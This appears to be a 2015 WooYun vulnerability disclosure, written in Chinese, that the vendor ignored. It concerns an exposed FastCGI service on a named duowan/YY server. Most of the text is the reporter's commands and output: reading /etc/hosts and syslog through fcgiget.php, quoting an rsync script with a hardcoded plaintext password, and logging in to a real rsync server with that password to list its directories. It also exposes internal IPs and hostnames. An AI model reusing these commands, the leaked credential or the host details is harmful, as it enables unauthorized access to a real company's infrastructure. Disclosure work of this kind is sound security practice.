乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-04: 细节已通知厂商并且等待厂商处理中 2015-02-09: 厂商已经主动忽略漏洞,细节向公众公开
RT
依然是fastcgi的问题,222.134.66.98这个ip
[root@localhost fastcgi]$ /usr/local/php/bin/php fcgiget.php 222.134.66.98:9000/etc/hostsX-Powered-By: PHP/5.2.6-3ubuntu4.6Content-type: text/html127.0.0.1 localhost222.134.66.98 ubuntu# The following lines are desirable for IPv6 capable hosts::1 localhost ip6-localhost ip6-loopbackfe00::0 ip6-localnetff00::0 ip6-mcastprefixff02::1 ip6-allnodesff02::2 ip6-allroutersff02::3 ip6-allhosts58.249.119.209 smproxy1.yy.duowan.com112.65.241.7 smproxy2.yy.duowan.com59.151.23.85 smproxy3.yy.duowan.com106.38.198.9 manager.repos.yy.duowan.com118.26.226.207 sdaemon.yy.duowan.com58.249.119.217 sdaemon2.yy.duowan.com58.248.187.58 yycookie.yy.duowan.com58.249.119.217 rdaemon.yy.duowan.com118.26.226.207 rdaemon2.yy.duowan.com58.249.119.217 relayDaemon.yy.duowan.com118.26.226.207 relayDaemon2.yy.duowan.com58.249.119.211 balance.yy.duowan.com221.228.79.31 bc.yy.duowan.com221.228.79.32 bc2.yy.duowan.com121.14.37.153 config.yy.duowan.com58.215.46.21 mirror.yy.duowan.com121.14.43.142 oams.yy.duowan.com106.38.255.130 oams2.yy.duowan.com
读下syslog看看
[root@localhost fastcgi]$ /usr/local/php/bin/php fcgiget.php 222.134.66.98:9000/var/log/syslog|grep rsyncFeb 4 05:30:01 ubuntu /USR/SBIN/CRON[7100]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)Feb 4 05:30:01 ubuntu /USR/SBIN/CRON[7102]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)Feb 4 05:40:01 ubuntu /USR/SBIN/CRON[19136]: (root) CMD (rsync -avzP /data/yy/log/STATLOG/*.gz [email protected]::sys_log/222_134_66_98 --password-file=/data/yy/log/STATLOG/pass.scr)Feb 4 06:00:01 ubuntu /USR/SBIN/CRON[7887]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)Feb 4 06:00:01 ubuntu /USR/SBIN/CRON[7892]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)Feb 4 06:30:01 ubuntu /USR/SBIN/CRON[11029]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)Feb 4 06:30:01 ubuntu /USR/SBIN/CRON[11034]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)Feb 4 07:00:01 ubuntu /USR/SBIN/CRON[11999]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)Feb 4 07:00:01 ubuntu /USR/SBIN/CRON[12004]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
这个文件/home/dspeak/rsync_jifen.sh
if [ "$ispType" = "5" ] ; then # CNC rsyncServerList="58.249.117.105 122.13.149.246 111.206.234.120" else # OTHER ISP rsyncServerList="121.14.39.137 121.14.43.217 106.38.255.155" fi.... for file in $syncList ; do flag=0 for rsyncServer in $rsyncServerList ; do rsync -az --password-file=/etc/rsync.scr $file jifen@${rsyncServer}::jifen/$ip/ ; rc=$? if [ $rc -eq 0 ] ; then info_short_log "sync file [$file] to [$rsyncServer] succeed , rc=[$rc]" else err_short_log "sync file [$file] to [$rsyncServer] failed , rc=[$rc]" fi ((flag+=$rc)) done
然后某个文件里面有这个密码,具体哪个我忘记了,对不起
echo 1qazxcv > /etc/rsync.scr chmod 600 /etc/rsync.scr else if [ ! -s /etc/rsync.scr ];then echo 1qazxcv > /etc/rsync.scr chmod 600 /etc/rsync.scr fi
不知道内容是啥,看不懂
[root@localhost fastcgi]$ rsync [email protected]::jifen |morePassword: drwxr-xr-x 102400 2015/02/03 14:00:13 .drwxr-xr-x 36864 2015/02/04 15:00:06 101.226.185.140drwxr-xr-x 32768 2015/02/04 15:30:14 101.226.185.145drwxr-xr-x 49152 2015/02/04 15:30:04 101.226.185.39drwxr-xr-x 53248 2015/02/04 15:30:06 101.226.185.40drwxr-xr-x 36864 2015/02/04 15:30:08 101.226.185.41drwxr-xr-x 36864 2015/02/04 15:30:03 101.226.185.44drwxr-xr-x 28672 2015/02/04 15:30:01 101.226.185.45drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.46drwxr-xr-x 36864 2015/02/04 15:30:04 101.226.185.47drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.48drwxr-xr-x 36864 2015/02/04 15:30:08 101.226.185.49drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.50drwxr-xr-x 36864 2015/02/04 15:30:18 101.226.185.51drwxr-xr-x 36864 2015/02/04 15:30:03 101.226.185.52drwxr-xr-x 36864 2015/02/04 15:30:04 101.226.185.53drwxr-xr-x 36864 2015/02/04 15:30:09 101.226.185.54drwxr-xr-x 36864 2015/02/04 15:30:03 101.226.185.55drwxr-xr-x 32768 2015/02/04 15:30:02 101.226.185.59drwxr-xr-x 36864 2015/02/04 15:30:07 101.226.185.60drwxr-xr-x 36864 2015/02/04 15:30:06 101.226.185.61drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.62drwxr-xr-x 4096 2015/02/04 14:30:02 101.4.56.118drwxr-xr-x 4096 2015/02/04 14:30:06 101.4.56.84drwxr-xr-x 4096 2015/02/04 15:00:02 101.4.56.85drwxr-xr-x 4096 2015/02/04 14:30:02 101.4.56.86
访问控制
危害等级:无影响厂商忽略
忽略时间:2015-02-09 16:02
暂无